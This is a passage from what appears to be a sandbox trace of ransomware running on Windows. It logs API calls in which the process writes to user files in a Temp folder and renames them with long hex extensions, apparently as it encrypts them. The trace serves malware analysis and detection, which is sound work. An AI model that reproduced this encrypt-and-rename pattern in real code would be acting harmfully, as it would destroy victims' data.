CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.171] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.172] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav", lpString2=".BAD1A1A4C469A65788A4A331A314C848BD9887CDA64871212ABDC1ED0D895E65" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav.BAD1A1A4C469A65788A4A331A314C848BD9887CDA64871212ABDC1ED0D895E65") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FMDT A0se5XpB9Td_C.wav.BAD1A1A4C469A65788A4A331A314C848BD9887CDA64871212ABDC1ED0D895E65" [0164.172] GetProcessHeap () returned 0x270000 [0164.172] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x4262b50 [0164.172] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x4262b50, Length=0x138, FileInformationClass=0xa) returned 0x0 [0164.174] CloseHandle (hObject=0x5b0) returned 1 [0164.327] GetProcessHeap () returned 0x270000 [0164.330] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.491] RtlInterlockedCompareExchange64 () returned 0xe [0164.492] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.492] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x76b87b8, ObjectInformationLength=0x10004, 
ReturnLength=0x72aff5c | out: ObjectInformation=0x76b87b8, ReturnLength=0x72aff5c) returned 0x0 [0164.493] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx", lpString2=".3BDB0E7CBFDB1FBFD8E7F5847B64D844A4D8302FB2864634D0E94484A1A2D441" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx.3BDB0E7CBFDB1FBFD8E7F5847B64D844A4D8302FB2864634D0E94484A1A2D441") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx.3BDB0E7CBFDB1FBFD8E7F5847B64D844A4D8302FB2864634D0E94484A1A2D441" [0164.493] GetProcessHeap () returned 0x270000 [0164.493] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4276088 [0164.493] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x72aff4c, FileInformation=0x4276088, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0164.496] CloseHandle (hObject=0x5cc) returned 1 [0164.500] GetProcessHeap () returned 0x270000 [0164.502] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8708 | out: hHeap=0x270000) returned 1 [0164.502] RtlInterlockedCompareExchange64 () returned 0xd [0164.502] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.502] NtQueryObject (in: Handle=0x5d0, ObjectInformationClass=0x1, ObjectInformation=0x76e0910, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76e0910, ReturnLength=0x72aff5c) returned 0x0 [0164.503] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav", lpString2=".DC5ED72F00767E2390CC185B2246EC4AE6D0061C8EF7B5E23082AD8E67B95B71" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav.DC5ED72F00767E2390CC185B2246EC4AE6D0061C8EF7B5E23082AD8E67B95B71") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\vuZUNZYfHxr7qOv1nIea.wav.DC5ED72F00767E2390CC185B2246EC4AE6D0061C8EF7B5E23082AD8E67B95B71" [0164.503] GetProcessHeap () returned 0x270000 [0164.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb378 [0164.504] NtSetInformationFile (FileHandle=0x5d0, IoStatusBlock=0x72aff4c, FileInformation=0x42fb378, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.506] CloseHandle (hObject=0x5d0) returned 1 [0164.512] GetProcessHeap () returned 0x270000 [0164.514] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e0860 | out: hHeap=0x270000) returned 1 [0164.526] RtlInterlockedCompareExchange64 () returned 0xc [0164.527] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.527] NtQueryObject (in: Handle=0x5d4, ObjectInformationClass=0x1, ObjectInformation=0x7708a68, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7708a68, ReturnLength=0x72aff5c) returned 0x0 [0164.528] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt", lpString2=".6C0E35637CFC71E800770657D0E6DDDE80FF226142B9A65E575B0097CCB39972" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt.6C0E35637CFC71E800770657D0E6DDDE80FF226142B9A65E575B0097CCB39972") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\W4Xv9jzg2KbFjS-q_dpx.ppt.6C0E35637CFC71E800770657D0E6DDDE80FF226142B9A65E575B0097CCB39972" [0164.528] GetProcessHeap () 
returned 0x270000 [0164.528] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb4c0 [0164.528] NtSetInformationFile (FileHandle=0x5d4, IoStatusBlock=0x72aff4c, FileInformation=0x42fb4c0, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.530] CloseHandle (hObject=0x5d4) returned 1 [0164.535] GetProcessHeap () returned 0x270000 [0164.537] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77089b8 | out: hHeap=0x270000) returned 1 [0164.539] RtlInterlockedCompareExchange64 () returned 0xb [0164.539] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.539] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x7730bc0, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7730bc0, ReturnLength=0x72aff5c) returned 0x0 [0164.541] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png", lpString2=".64919444735C127E825679C3B8E8F2CE6BDEC81E6586889C7BB391FE7DEB174E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png.64919444735C127E825679C3B8E8F2CE6BDEC81E6586889C7BB391FE7DEB174E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\y S-BBqSytXN.png.64919444735C127E825679C3B8E8F2CE6BDEC81E6586889C7BB391FE7DEB174E" [0164.541] GetProcessHeap () returned 0x270000 [0164.541] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x425d540 [0164.541] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x72aff4c, FileInformation=0x425d540, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0164.544] CloseHandle (hObject=0x5d8) returned 1 [0164.548] GetProcessHeap () returned 0x270000 [0164.549] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x7730b10 | out: hHeap=0x270000) returned 1 [0164.555] RtlInterlockedCompareExchange64 () returned 0xa [0164.555] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.556] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x7758d18, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7758d18, ReturnLength=0x72aff5c) returned 0x0 [0164.557] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav", lpString2=".6EC0B496EF26B1A050F12B4EE62F87B17A630274ACAB7F0E589F3AAA3F84055C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav.6EC0B496EF26B1A050F12B4EE62F87B17A630274ACAB7F0E589F3AAA3F84055C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav.6EC0B496EF26B1A050F12B4EE62F87B17A630274ACAB7F0E589F3AAA3F84055C" [0164.557] GetProcessHeap () returned 0x270000 [0164.557] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x76b8708 [0164.557] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x72aff4c, FileInformation=0x76b8708, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.560] CloseHandle (hObject=0x5dc) returned 1 [0164.565] GetProcessHeap () returned 0x270000 [0164.567] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7758c68 | out: hHeap=0x270000) returned 1 [0164.569] RtlInterlockedCompareExchange64 () returned 0x9 [0164.570] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, 
lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.570] NtQueryObject (in: Handle=0x5e0, ObjectInformationClass=0x1, ObjectInformation=0x7780e70, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7780e70, ReturnLength=0x72aff5c) returned 0x0 [0164.571] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif", lpString2=".F8E2C682CD6073D227A54F5034CA8AE5A2683E96D0ABCF9CEE6E6A947B793019" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif.F8E2C682CD6073D227A54F5034CA8AE5A2683E96D0ABCF9CEE6E6A947B793019") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif.F8E2C682CD6073D227A54F5034CA8AE5A2683E96D0ABCF9CEE6E6A947B793019" [0164.571] GetProcessHeap () returned 0x270000 [0164.571] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425d678 [0164.571] NtSetInformationFile (FileHandle=0x5e0, IoStatusBlock=0x72aff4c, FileInformation=0x425d678, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.573] CloseHandle (hObject=0x5e0) returned 1 [0164.581] GetProcessHeap () returned 0x270000 [0164.583] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7780dc0 | out: hHeap=0x270000) returned 1 [0164.585] RtlInterlockedCompareExchange64 () returned 0x8 [0164.585] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.585] WriteFile (in: hFile=0x4a8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x7600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0164.586] RtlInterlockedCompareExchange64 () returned 0x7 [0164.587] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.587] WriteFile (in: hFile=0x590, lpBuffer=0x7610188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050) returned 1 [0164.588] RtlInterlockedCompareExchange64 () returned 0x8 [0164.588] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.589] WriteFile (in: hFile=0x5b0, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0164.590] RtlInterlockedCompareExchange64 () returned 0x9 [0164.590] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.590] WriteFile (in: hFile=0x5ac, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0164.592] RtlInterlockedCompareExchange64 () returned 0xa [0164.592] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.592] WriteFile 
(in: hFile=0x58c, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0164.594] RtlInterlockedCompareExchange64 () returned 0xb [0164.594] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.595] WriteFile (in: hFile=0x5b8, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0164.596] RtlInterlockedCompareExchange64 () returned 0xc [0164.596] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.596] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x73e00f8, ReturnLength=0x72aff5c) returned 0x0 [0164.598] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif", lpString2=".DEE575B9BB025795EF9A3F0B925132F8D3BD499AE0E46DAAFCC1977CF57A095C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif.DEE575B9BB025795EF9A3F0B925132F8D3BD499AE0E46DAAFCC1977CF57A095C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif.DEE575B9BB025795EF9A3F0B925132F8D3BD499AE0E46DAAFCC1977CF57A095C" [0164.598] GetProcessHeap () returned 0x270000 [0164.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) 
returned 0x425d7b0 [0164.598] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x72aff4c, FileInformation=0x425d7b0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.599] CloseHandle (hObject=0x4a8) returned 1 [0164.604] GetProcessHeap () returned 0x270000 [0164.606] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0164.607] RtlInterlockedCompareExchange64 () returned 0xd [0164.607] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.607] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x75f0100, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x75f0100, ReturnLength=0x72aff5c) returned 0x0 [0164.608] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt", lpString2=".BB477DB4864C8764D9E0E073D2983F307C4392080D6F683AF6292C0692AFE046" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt.BB477DB4864C8764D9E0E073D2983F307C4392080D6F683AF6292C0692AFE046") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\3xh08hMVFrSWoJ.ppt.BB477DB4864C8764D9E0E073D2983F307C4392080D6F683AF6292C0692AFE046" [0164.608] GetProcessHeap () returned 0x270000 [0164.608] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x425d8e8 [0164.609] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x425d8e8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0164.611] CloseHandle (hObject=0x590) returned 1 [0164.615] GetProcessHeap () returned 0x270000 [0164.617] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0164.625] 
RtlInterlockedCompareExchange64 () returned 0xc [0164.625] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.625] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0164.627] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3", lpString2=".D0104A60F274A0B7A59EF8CFB8A3CC4BC1297BF446ACC84F4D8368EC08A3A870" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3.D0104A60F274A0B7A59EF8CFB8A3CC4BC1297BF446ACC84F4D8368EC08A3A870") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3.D0104A60F274A0B7A59EF8CFB8A3CC4BC1297BF446ACC84F4D8368EC08A3A870" [0164.627] GetProcessHeap () returned 0x270000 [0164.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425da20 [0164.627] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x425da20, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.629] CloseHandle (hObject=0x5b0) returned 1 [0164.630] GetProcessHeap () returned 0x270000 [0164.632] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0164.634] RtlInterlockedCompareExchange64 () returned 0xb [0164.634] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.634] NtQueryObject (in: Handle=0x5ac, 
ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74723c8, ReturnLength=0x72aff5c) returned 0x0 [0164.635] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps", lpString2=".8635675D980E82580AEA8D3961A5C6C0D4C1990BFE68C672A112D97514C0D531" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps.8635675D980E82580AEA8D3961A5C6C0D4C1990BFE68C672A112D97514C0D531") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps.8635675D980E82580AEA8D3961A5C6C0D4C1990BFE68C672A112D97514C0D531" [0164.635] GetProcessHeap () returned 0x270000 [0164.635] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42761b0 [0164.635] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x72aff4c, FileInformation=0x42761b0, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0164.639] CloseHandle (hObject=0x5ac) returned 1 [0164.649] GetProcessHeap () returned 0x270000 [0164.651] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0164.652] RtlInterlockedCompareExchange64 () returned 0xa [0164.652] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.652] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x750a220, ReturnLength=0x72aff5c) returned 0x0 [0164.653] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a", lpString2=".9C3BE64F996879C4B33DD0AEF403CD9F83FA5A5D9FD75F2D3286A46101F5524A" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a.9C3BE64F996879C4B33DD0AEF403CD9F83FA5A5D9FD75F2D3286A46101F5524A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a.9C3BE64F996879C4B33DD0AEF403CD9F83FA5A5D9FD75F2D3286A46101F5524A" [0164.653] GetProcessHeap () returned 0x270000 [0164.653] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x76b8850 [0164.653] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x76b8850, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0164.655] CloseHandle (hObject=0x58c) returned 1 [0164.660] GetProcessHeap () returned 0x270000 [0164.661] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0164.669] RtlInterlockedCompareExchange64 () returned 0x9 [0164.669] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.669] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7532378, ReturnLength=0x72aff5c) returned 0x0 [0164.670] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3", lpString2=".807A64FA8580AE80E5C10B3287727B8E3F62507374DB47AC9C8F0D9998FF716E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3.807A64FA8580AE80E5C10B3287727B8E3F62507374DB47AC9C8F0D9998FF716E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3.807A64FA8580AE80E5C10B3287727B8E3F62507374DB47AC9C8F0D9998FF716E" [0164.670] GetProcessHeap () returned 0x270000 [0164.670] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425db58 [0164.670] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x72aff4c, FileInformation=0x425db58, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.673] CloseHandle (hObject=0x5b8) returned 1 [0164.678] GetProcessHeap () returned 0x270000 [0164.680] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0164.714] RtlInterlockedCompareExchange64 () returned 0x1 [0164.714] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.719] ReadFile (in: hFile=0x5e4, lpBuffer=0x77c9050, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a8f18 | out: lpBuffer=0x77c9050*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a8f18) returned 1 [0164.720] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.722] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x77a8fc8, ObjectInformationLength=0x10004, 